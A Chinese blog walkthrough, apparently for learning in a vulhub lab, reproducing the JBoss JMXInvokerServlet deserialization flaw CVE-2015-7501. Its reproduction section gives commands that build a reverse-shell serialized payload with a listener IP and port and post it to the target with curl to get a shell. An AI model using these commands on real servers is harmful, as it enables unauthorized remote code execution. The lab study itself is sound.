Loading

CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞

0X00-引言


你知道什么是当当当当吗?

0X01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述


JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本:

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

0X03-漏洞复现


下载JavaDeserH2HC 工具(用于生成序列化数据):https://github.com/joaomatosf/javadeserh2hc

http://192.168.234.128:8080/

image-20211221195846337

01-验证漏洞

访问http://192.168.234.128:8080/invoker/JMXInvokerServlet

提示下载内容,可能存在漏洞

image-20211221200054400

02-重定向到ReverseShellCommonsCollectionsHashMap.ser文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.234.135:888   #填写监听机IP和port
curl http://192.168.234.128:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser  #提交二进制数据

image-20211221200545588

image-20211221200603762

03-反弹shell

image-20211221200637648

0X04-工具检测


工具下载:https://github.com/s0k/Deserialize

image-20211221204441364

0X05-免责声明

仅供学习使用

0X06-参考

[Vulhub] JBoss反序列化漏洞复现

https://paper.seebug.org/312/

posted @ 2021-12-21 22:09  美式加糖  阅读(1008)  评论(0编辑  收藏  举报